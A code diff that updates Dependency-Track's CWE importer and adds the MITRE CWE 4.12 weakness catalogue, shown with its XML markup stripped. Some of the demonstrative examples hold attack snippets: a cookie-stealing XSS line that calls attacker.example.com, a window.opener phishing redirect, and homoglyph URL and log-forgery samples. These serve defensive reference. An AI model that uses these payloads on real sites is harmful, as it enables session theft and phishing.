diff --git a/src/main/java/org/dependencytrack/persistence/CweImporter.java b/src/main/java/org/dependencytrack/persistence/CweImporter.java index b529dae6f..945e066ea 100644 --- a/src/main/java/org/dependencytrack/persistence/CweImporter.java +++ b/src/main/java/org/dependencytrack/persistence/CweImporter.java @@ -52,7 +52,7 @@ public class CweImporter { public void processCweDefinitions() throws ParserConfigurationException, SAXException, IOException, XPathExpressionException { try (QueryManager qm = new QueryManager(); - InputStream is = Thread.currentThread().getContextClassLoader().getResourceAsStream("nist/cwec_v4.6.xml")) { + InputStream is = Thread.currentThread().getContextClassLoader().getResourceAsStream("nist/cwec_v4.12.xml")) { LOGGER.info("Synchronizing CWEs with datastore"); diff --git a/src/main/resources/nist/cwec_v4.12.xml b/src/main/resources/nist/cwec_v4.12.xml new file mode 100644 index 000000000..e5af2463e --- /dev/null +++ b/src/main/resources/nist/cwec_v4.12.xml @@ -0,0 +1,218980 @@ + + + + The product uses a cookie to store sensitive information, but the cookie is not marked with the HttpOnly flag. + The HttpOnly flag directs compatible browsers to prevent client-side script from accessing cookies. Including the HttpOnly flag in the Set-Cookie HTTP response header helps mitigate the risk associated with Cross-Site Scripting (XSS) where an attacker's script code might attempt to read the contents of a cookie and exfiltrate information obtained. When set, browsers that support the flag will not reveal the contents of the cookie to a third party via client-side script executed via XSS. + + + + + + + + + An HTTP cookie is a small piece of data attributed to a specific website and stored on the user's computer by the user's web browser. This data can be leveraged for a variety of purposes including saving information entered into form fields, recording user activity, and for authentication purposes. Cookies used to save or record information generated by the user are accessed and modified by script code embedded in a web page. While cookies used for authentication are created by the website's server and sent to the user to be attached to future requests. These authentication cookies are often not meant to be accessed by the web page sent to the user, and are instead just supposed to be attached to future requests to verify authentication details. + + + + Implementation + + + Medium + + + Confidentiality + Read Application Data + If the HttpOnly flag is not set, then sensitive information stored in the cookie may be exposed to unintended parties. + + + Integrity + Gain Privileges or Assume Identity + If the cookie in question is an authentication cookie, then not setting the HttpOnly flag may allow an adversary to steal authentication data (e.g., a session ID) and assume the identity of the user. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Leverage the HttpOnly flag when setting a sensitive cookie in a response. + High + While this mitigation is effective for protecting cookies from a browser's own scripting engine, third-party components or plugins may have their own engines that allow access to cookies. Attackers might also be able to use XMLHTTPResponse to read the headers directly and obtain the cookie. + + + + + In this example, a cookie is used to store a session ID for a client's interaction with a website. The intention is that the cookie will be sent to the website with each request made by the client. + The snippet of code below establishes a new cookie to hold the sessionID. + + String sessionID = generateSessionId();Cookie c = new Cookie("session_id", sessionID);response.addCookie(c); + + The HttpOnly flag is not set for the cookie. An attacker who can perform XSS could insert malicious script such as: + + document.write('<img src="http://attacker.example.com/collect-cookies?cookie=' + document.cookie . '">' + + When the client loads and executes this script, it makes a request to the attacker-controlled web site. The attacker can then log the request and steal the cookie. + To mitigate the risk, use the setHttpOnly(true) method. + + String sessionID = generateSessionId();Cookie c = new Cookie("session_id", sessionID);c.setHttpOnly(true);response.addCookie(c); + + + + + + CVE-2014-3852 + CMS written in Python does not include the HTTPOnly flag in a Set-Cookie header, allowing remote attackers to obtain potentially sensitive information via script access to this cookie. + https://www.cve.org/CVERecord?id=CVE-2014-3852 + + + CVE-2015-4138 + Appliance for managing encrypted communications does not use HttpOnly flag. + https://www.cve.org/CVERecord?id=CVE-2015-4138 + + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2017-01-02 + 2.10 + 2017-01-19 + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, References, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, References, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product displays information or identifiers to a user, but the display mechanism does not make it easy for the user to distinguish between visually similar or identical glyphs (homoglyphs), which may cause the user to misinterpret a glyph and perform an unintended, insecure action. + + Some glyphs, pictures, or icons can be semantically distinct to a program, while appearing very similar or identical to a human user. These are referred to as homoglyphs. For example, the lowercase "l" (ell) and uppercase "I" (eye) have different character codes, but these characters can be displayed in exactly the same way to a user, depending on the font. This can also occur between different character sets. For example, the Latin capital letter "A" and the Greek capital letter "Α" (Alpha) are treated as distinct by programs, but may be displayed in exactly the same way to a user. Accent marks may also cause letters to appear very similar, such as the Latin capital letter grave mark "À" and its equivalent "Á" with the acute accent. + Adversaries can exploit this visual similarity for attacks such as phishing, e.g. by providing a link to an attacker-controlled hostname that looks like a hostname that the victim trusts. In a different use of homoglyphs, an adversary may create a back door username that is visually similar to the username of a regular user, which then makes it more difficult for a system administrator to detect the malicious username while reviewing logs. + + + + + + + Resultant + + + + + + + + + Homograph Attack + "Homograph" is often used as a synonym of "homoglyph" by researchers, but according to Wikipedia, a homograph is a word that has multiple, distinct meanings. + + + + + Architecture and Design + This weakness may occur when characters from various character sets are allowed to be interchanged within a URL, username, email address, etc. without any notification to the user or underlying system being used. + + + Implementation + + + Medium + + + Integrity + Confidentiality + Other + An attacker may ultimately redirect a user to a malicious website, by deceiving the user into believing the URL they are accessing is a trusted domain. However, the attack can also be used to forge log entries by using homoglyphs in usernames. Homoglyph manipulations are often the first step towards executing advanced attacks such as stealing a user's credentials, Cross-Site Scripting (XSS), or log forgery. If an attacker redirects a user to a malicious site, the attacker can mimic a trusted domain to steal account credentials and perform actions on behalf of the user, without the user's knowledge. Similarly, an attacker could create a username for a website that contains homoglyph characters, making it difficult for an admin to review logs and determine which users performed which actions. + + + + + Manual Dynamic Analysis + If utilizing user accounts, attempt to submit a username that contains homoglyphs. Similarly, check to see if links containing homoglyphs can be sent via email, web browsers, or other mechanisms. + Moderate + + + + + Implementation + + Use a browser that displays Punycode for IDNs in the URL and status bars, or which color code various scripts in URLs. + Due to the prominence of homoglyph attacks, several browsers now help safeguard against this attack via the use of Punycode. For example, Mozilla Firefox and Google Chrome will display IDNs as Punycode if top-level domains do not restrict which characters can be used in domain names or if labels mix scripts for different languages. + + + + Implementation + + Use an email client that has strict filters and prevents messages that mix character sets to end up in a user's inbox. + Certain email clients such as Google's GMail prevent the use of non-Latin characters in email addresses or in links contained within emails. This helps prevent homoglyph attacks by flagging these emails and redirecting them to a user's spam folder. + + + + + + The following looks like a simple, trusted URL that a user may frequently access. + + http://www.еxаmрlе.соm + + However, the URL above is comprised of Cyrillic characters that look identical to the expected ASCII characters. This results in most users not being able to distinguish between the two and assuming that the above URL is trusted and safe. The "e" is actually the "CYRILLIC SMALL LETTER IE" which is represented in HTML as the character &#x435, while the "a" is actually the "CYRILLIC SMALL LETTER A" which is represented in HTML as the character &#x430. The "p", "c", and "o" are also Cyrillic characters in this example. Viewing the source reveals a URL of "http://www.&#x435;x&#x430;m&#x440;l&#x435;.&#x441;&#x43e;m". An adversary can utilize this approach to perform an attack such as a phishing attack in order to drive traffic to a malicious website. + + + The following displays an example of how creating usernames containing homoglyphs can lead to log forgery. + Assume an adversary visits a legitimate, trusted domain and creates an account named "admin", except the 'a' and 'i' characters are Cyrillic characters instead of the expected ASCII. Any actions the adversary performs will be saved to the log file and look like they came from a legitimate administrator account. + + 123.123.123.123 аdmіn [17/Jul/2017:09:05:49 -0400] "GET /example/users/userlist HTTP/1.1" 401 12846 + 123.123.123.123 аdmіn [17/Jul/2017:09:06:51 -0400] "GET /example/users/userlist HTTP/1.1" 200 4523 + 123.123.123.123 admin [17/Jul/2017:09:10:02 -0400] "GET /example/users/editusers HTTP/1.1" 200 6291 + 123.123.123.123 аdmіn [17/Jul/2017:09:10:02 -0400] "GET /example/users/editusers HTTP/1.1" 200 6291 + + + Upon closer inspection, the account that generated three of these log entries is "&#x430;dm&#x456;n". Only the third log entry is by the legitimate admin account. This makes it more difficult to determine which actions were performed by the adversary and which actions were executed by the legitimate "admin" account. + + + + + CVE-2013-7236 + web forum allows impersonation of users with homoglyphs in account names + https://www.cve.org/CVERecord?id=CVE-2013-7236 + + + CVE-2012-0584 + Improper character restriction in URLs in web browser + https://www.cve.org/CVERecord?id=CVE-2012-0584 + + + CVE-2009-0652 + Incomplete denylist does not include homoglyphs of "/" and "?" characters in URLs + https://www.cve.org/CVERecord?id=CVE-2009-0652 + + + CVE-2017-5015 + web browser does not convert hyphens to punycode, allowing IDN spoofing in URLs + https://www.cve.org/CVERecord?id=CVE-2017-5015 + + + CVE-2005-0233 + homoglyph spoofing using punycode in URLs and certificates + https://www.cve.org/CVERecord?id=CVE-2005-0233 + + + CVE-2005-0234 + homoglyph spoofing using punycode in URLs and certificates + https://www.cve.org/CVERecord?id=CVE-2005-0234 + + + CVE-2005-0235 + homoglyph spoofing using punycode in URLs and certificates + https://www.cve.org/CVERecord?id=CVE-2005-0235 + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2017-07-24 + 2.12 + 2017-11-08 + + + CWE Content Team + MITRE + 2018-03-27 + updated Demonstrative_Examples, Description, References + + + CWE Content Team + MITRE + 2019-01-03 + updated Demonstrative_Examples, Description, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Observed_Examples + + + CWE Content Team + MITRE + 2022-10-13 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Demonstrative_Examples, Description, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses multiple validation forms with the same name, which might cause the Struts Validator to validate a form that the programmer does not expect. + If two validation forms have the same name, the Struts Validator arbitrarily chooses one of the forms to use for input validation and discards the other. This decision might not correspond to the programmer's expectations, possibly leading to resultant weaknesses. Moreover, it indicates that the validation logic is not up-to-date, and can indicate that other, more subtle validation errors are present. + + + + + + + + Primary + + + + + + + + Implementation + + + + + Integrity + Unexpected State + + + + + Implementation + The DTD or schema validation will not catch the duplicate occurrence of the same form name. To find the issue in the implementation, manual checks or automated static analysis could be applied to the xml configuration files. + + + + + Two validation forms with the same name. + + <form-validation><formset><form name="ProjectForm"> ... </form><form name="ProjectForm"> ... </form></formset></form-validation> + + It is critically important that validation logic be maintained and kept in sync with the rest of the product. + + + + + Struts: Duplicate Validation Forms + + + SFP24 + Tainted input to command + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Demonstrative_Example, Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2008-10-14 + updated Description, Other_Notes, Potential_Mitigations + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2009-07-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-12-28 + updated Background_Details, Common_Consequences, Other_Notes + + + CWE Content Team + MITRE + 2011-03-29 + updated Background_Details, Common_Consequences + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Causal_Nature, Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Demonstrative_Examples, Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The web application does not restrict or incorrectly restricts frame objects or UI layers that belong to another application or domain, which can lead to user confusion about which interface the user is interacting with. + A web application is expected to place restrictions on whether it is allowed to be rendered within frames, iframes, objects, embed or applet elements. Without the restrictions, users can be tricked into interacting with the application when they were not intending to. + + + + + + + + + + + Clickjacking + + + UI Redress Attack + + + Tapjacking + "Tapjacking" is similar to clickjacking, except it is used for mobile applications in which the user "taps" the application instead of performing a mouse click. + + + + + Implementation + + + + + Access Control + Gain Privileges or Assume Identity + Bypass Protection Mechanism + Read Application Data + Modify Application Data + An attacker can trick a user into performing actions that are masked and hidden from the user's view. The impact varies widely, depending on the functionality of the underlying application. For example, in a social media application, clickjacking could be used to trik the user into changing privacy settings. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + + The use of X-Frame-Options allows developers of web content to restrict the usage of their application within the form of overlays, frames, or iFrames. The developer can indicate from which domains can frame the content. + The concept of X-Frame-Options is well documented, but implementation of this protection mechanism is in development to cover gaps. There is a need for allowing frames from multiple domains. + + + + Implementation + + A developer can use a "frame-breaker" script in each page that should not be framed. This is very helpful for legacy browsers that do not support X-Frame-Options security feature previously mentioned. + It is also important to note that this tactic has been circumvented or bypassed. Improper usage of frames can persist in the web application through nested frames. The "frame-breaking" script does not intuitively account for multiple nested frames that can be presented to the user. + + + + Implementation + This defense-in-depth technique can be used to prevent the improper usage of frames in web applications. It prioritizes the valid sources of data to be loaded into the application through the usage of declarative policies. Based on which implementation of Content Security Policy is in use, the developer should use the "frame-ancestors" directive or the "frame-src" directive to mitigate this weakness. Both directives allow for the placement of restrictions when it comes to allowing embedded content. + + + + + CVE-2017-7440 + E-mail preview feature in a desktop application allows clickjacking attacks via a crafted e-mail message + https://www.cve.org/CVERecord?id=CVE-2017-7440 + + + CVE-2017-5697 + Hardware/firmware product has insufficient clickjacking protection in its web user interface + https://www.cve.org/CVERecord?id=CVE-2017-5697 + + + CVE-2017-4015 + Clickjacking in data-loss prevention product via HTTP response header. + https://www.cve.org/CVERecord?id=CVE-2017-4015 + + + CVE-2016-2496 + Tapjacking in permission dialog for mobile OS allows access of private storage using a partially-overlapping window. + https://www.cve.org/CVERecord?id=CVE-2016-2496 + + + CVE-2015-1241 + Tapjacking in web browser related to page navigation and touch/gesture events. + https://www.cve.org/CVERecord?id=CVE-2015-1241 + + + CVE-2017-0492 + System UI in mobile OS allows a malicious application to create a UI overlay of the entire screen to gain privileges. + https://www.cve.org/CVERecord?id=CVE-2017-0492 + + + + + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2017-08-01 + 2.12 + 2017-11-08 + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2020-08-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The web application produces links to untrusted external sites outside of its sphere of control, but it does not properly prevent the external site from modifying security-critical properties of the window.opener object, such as the location property. + When a user clicks a link to an external site ("target"), the target="_blank" attribute causes the target site's contents to be opened in a new window or tab, which runs in the same process as the original page. The window.opener object records information about the original page that offered the link. If an attacker can run script on the target page, then they could read or modify certain properties of the window.opener object, including the location property - even if the original and target site are not the same origin. An attacker can modify the location property to automatically redirect the user to a malicious site, e.g. as part of a phishing attack. Since this redirect happens in the original window/tab - which is not necessarily visible, since the browser is focusing the display on the new target page - the user might not notice any suspicious redirection. + + + + + + + + + + tabnabbing + + + + + Architecture and Design + This weakness is introduced during the design of an application when the architect does not specify that a linked external document should not be able to alter the location of the calling page. + + + Implementation + This weakness is introduced during the coding of an application when the developer does not include the noopener and/or noreferrer value for the rel attribute. + + + Medium + + + Confidentiality + Alter Execution Logic + The user may be redirected to an untrusted page that contains undesired content or malicious script code. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + Specify in the design that any linked external document must not be granted access to the location object of the calling page. + + + Implementation + + When creating a link to an external document using the <a> tag with a defined target, for example "_blank" or a named frame, provide the rel attribute with a value "noopener noreferrer". + If opening the external document in a new window via javascript, then reset the opener by setting it equal to null. + + + + Implementation + + Do not use "_blank" targets. However, this can affect the usability of the application. + + + + + + In this example, the application opens a link in a named window/tab without taking precautions to prevent the called page from tampering with the calling page's location in the browser. + There are two ways that this weakness is commonly seen. The first is when the application generates an <a> tag is with target="_blank" to point to a target site: + + <a href="http://attacker-site.example.com/useful-page.html" target="_blank"> + + If the attacker offers a useful page on this link (or compromises a trusted, popular site), then a user may click on this link. However, the attacker could use scripting code to modify the window.opener's location property to redirect the application to a malicious, attacker-controlled page - such as one that mimics the look and feel of the original application and convinces the user to re-enter authentication credentials, i.e. phishing: + + window.opener.location = 'http://phishing.example.org/popular-bank-page'; + + To mitigate this type of weakness, some browsers support the "rel" attribute with a value of "noopener", which sets the window.opener object equal to null. Another option is to use the "rel" attribute with a value of "noreferrer", which in essence does the same thing. + + <a href="http://attacker-site.example.com/useful-page.html" target="_blank" rel="noopener noreferrer"> + + A second way that this weakness is commonly seen is when opening a new site directly within JavaScript. In this case, a new site is opened using the window.open() function. + + var newWindow = window.open("http://attacker-site.example.com/useful-page.html", "_blank"); + + To mitigate this, set the window.opener object to null. + + var newWindow = window.open("http://attacker-site.example.com/useful-page.html", "_blank");newWindow.opener = null; + + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + David Deatherage + Silicon Valley Bank + 2017-09-26 + 2.12 + 2017-11-08 + + + CWE Content Team + MITRE + 2018-03-27 + updated Alternate_Terms, Demonstrative_Examples, Description, Modes_of_Introduction, Name, Potential_Mitigations, References + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Improper Restriction of Cross-Origin Permission to window.opener.location + + + + The product performs a comparison between entities that must consider multiple factors or characteristics of each entity, but the comparison does not include one or more of these factors. + + An incomplete comparison can lead to resultant weaknesses, e.g., by operating on the wrong object or making a security decision without considering a required factor. + + + + + + + Primary + + + + + + + + Implementation + + + + + Integrity + Access Control + Alter Execution Logic + Bypass Protection Mechanism + + + + + Testing + Thoroughly test the comparison scheme before deploying code into production. Perform positive testing as well as negative testing. + + + + + Consider an application in which Truck objects are defined to be the same if they have the same make, the same model, and were manufactured in the same year. + + public class Truck { + private String make;private String model;private int year; + public boolean equals(Object o) { + if (o == null) return false;if (o == this) return true;if (!(o instanceof Truck)) return false; + Truck t = (Truck) o; + return (this.make.equals(t.getMake()) && this.model.equals(t.getModel())); + } + } + + Here, the equals() method only checks the make and model of the Truck objects, but the year of manufacture is not included. + + + This example defines a fixed username and password. The AuthenticateUser() function is intended to accept a username and a password from an untrusted user, and check to ensure that it matches the username and password. If the username and password match, AuthenticateUser() is intended to indicate that authentication succeeded. + + + /* Ignore CWE-259 (hard-coded password) and CWE-309 (use of password system for authentication) for this example. */ + + char *username = "admin";char *pass = "password"; + int AuthenticateUser(char *inUser, char *inPass) {if (strncmp(username, inUser, strlen(inUser))) {logEvent("Auth failure of username using strlen of inUser");return(AUTH_FAIL);}if (! strncmp(pass, inPass, strlen(inPass))) {logEvent("Auth success of password using strlen of inUser");return(AUTH_SUCCESS);}else {logEvent("Auth fail of password using sizeof");return(AUTH_FAIL);}} + int main (int argc, char **argv) { + int authResult;if (argc < 3) {ExitError("Usage: Provide a username and password");}authResult = AuthenticateUser(argv[1], argv[2]);if (authResult == AUTH_SUCCESS) {DoAuthenticatedTask(argv[1]);}else {ExitError("Authentication failed");}} + + In AuthenticateUser(), the strncmp() call uses the string length of an attacker-provided inPass parameter in order to determine how many characters to check in the password. So, if the attacker only provides a password of length 1, the check will only examine the first byte of the application's password before determining success. + As a result, this partial comparison leads to improper authentication (CWE-287). + Any of these passwords would still cause authentication to succeed for the "admin" user: + + ppapaspass + + This significantly reduces the search space for an attacker, making brute force attacks more feasible. + The same problem also applies to the username, so values such as "a" and "adm" will succeed for the username. + While this demonstrative example may not seem realistic, see the Observed Examples for CVE entries that effectively reflect this same weakness. + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + + CWE Content Team + MITRE + 2018-01-04 + 3.1 + 2018-03-29 + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Relationships, Type + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product performs a comparison between two entities, but the entities are of different, incompatible types that cannot be guaranteed to provide correct results when they are directly compared. + In languages that are strictly typed but support casting/conversion, such as C or C++, the programmer might assume that casting one entity to the same type as another entity will ensure that the comparison will be performed correctly, but this cannot be guaranteed. In languages that are not strictly typed, such as PHP or JavaScript, there may be implicit casting/conversion to a type that the programmer is unaware of, causing unexpected results; for example, the string "123" might be converted to a number type. See examples. + + + + + + Primary + + + + + + + + + + Implementation + + + + + Other + Varies by Context + + + + + Testing + Thoroughly test the comparison scheme before deploying code into production. Perform positive testing as well as negative testing. + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-01-04 + 3.1 + 2018-03-29 + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The code performs a comparison between two entities, but the comparison examines the wrong factors or characteristics of the entities, which can lead to incorrect results and resultant weaknesses. + This can lead to incorrect results and resultant weaknesses. For example, the code might inadvertently compare references to objects, instead of the relevant contents of those objects, causing two "equal" objects to be considered unequal. + + + + + + Primary + + + + + + + + Implementation + + + + + Other + Varies by Context + + + + + Testing + Thoroughly test the comparison scheme before deploying code into production. Perform positive testing as well as negative testing. + + + + + In the example below, two Java String objects are declared and initialized with the same string values. An if statement is used to determine if the strings are equivalent. + + String str1 = new String("Hello");String str2 = new String("Hello");if (str1 == str2) {System.out.println("str1 == str2");} + + However, the if statement will not be executed as the strings are compared using the "==" operator. For Java objects, such as String objects, the "==" operator compares object references, not object values. While the two String objects above contain the same string values, they refer to different object references, so the System.out.println statement will not be executed. To compare object values, the previous code could be modified to use the equals method: + + if (str1.equals(str2)) {System.out.println("str1 equals str2");} + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-01-04 + 3.1 + 2018-03-29 + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product has a validator form that either does not define a validate() method, or defines a validate() method but does not call super.validate(). + If the code does not call super.validate(), the Validation Framework cannot check the contents of the form against a validation form. In other words, the validation framework will be disabled for the given form. + + + + + + + Primary + + + + + + + The Struts Validator uses a form's validate() method to check the contents of the form properties against the constraints specified in the associated validation form. That means the following classes have a validate() method that is part of the validation framework: ValidatorForm, ValidatorActionForm, DynaValidatorForm, and DynaValidatorActionForm. If the code creates a class that extends one of these classes, and if that class implements custom validation logic by overriding the validate() method, the code must call super.validate() in the validate() implementation. + + + + Implementation + + + + + Other + Other + Disabling the validation framework for a form exposes the product to numerous types of attacks. Unchecked input is the root cause of vulnerabilities like cross-site scripting, process control, and SQL injection. + + + Confidentiality + Integrity + Availability + Other + Other + Although J2EE applications are not generally susceptible to memory corruption attacks, if a J2EE application interfaces with native code that does not perform array bounds checking, an attacker may be able to use an input validation mistake in the J2EE application to launch a buffer overflow attack. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Implement the validate() method and call super.validate() within that method. + + + + + In the following Java example the class RegistrationForm is a Struts framework ActionForm Bean that will maintain user input data from a registration webpage for an online business site. The user will enter registration data and the RegistrationForm bean in the Struts framework will maintain the user data. Tthe RegistrationForm class implements the validate method to validate the user input entered into the form. + + public class RegistrationForm extends org.apache.struts.validator.ValidatorForm { + // private variables for registration formprivate String name;private String email;... + public RegistrationForm() {super();} + public ActionErrors validate(ActionMapping mapping, HttpServletRequest request) {ActionErrors errors = new ActionErrors();if (getName() == null || getName().length() < 1) {errors.add("name", new ActionMessage("error.name.required"));}return errors;} + + // getter and setter methods for private variables... + } + + Although the validate method is implemented in this example the method does not call the validate method of the ValidatorForm parent class with a call super.validate(). Without the call to the parent validator class only the custom validation will be performed and the default validation will not be performed. The following example shows that the validate method of the ValidatorForm class is called within the implementation of the validate method. + + public class RegistrationForm extends org.apache.struts.validator.ValidatorForm { + + // private variables for registration formprivate String name;private String email;... + public RegistrationForm() {super();} + public ActionErrors validate(ActionMapping mapping, HttpServletRequest request) {ActionErrors errors = super.validate(mapping, request);if (errors == null) {errors = new ActionErrors();} + + if (getName() == null || getName().length() < 1) {errors.add("name", new ActionMessage("error.name.required"));}return errors; + } + // getter and setter methods for private variables...} + + + + + + Struts: Erroneous validate() Method + + + SFP24 + Tainted input to command + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This could introduce other weaknesses related to missing input validation. + The current description implies a loose composite of two separate weaknesses, so this node might need to be split or converted into a low-level category. + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2008-10-14 + updated Description, Maintenance_Notes + + + CWE Content Team + MITRE + 2008-11-24 + updated Background_Details, Common_Consequences, Description, Other_Notes, Relationship_Notes + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2009-12-28 + updated Common_Consequences, Other_Notes + + + CWE Content Team + MITRE + 2010-06-21 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2010-12-13 + updated Description + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, 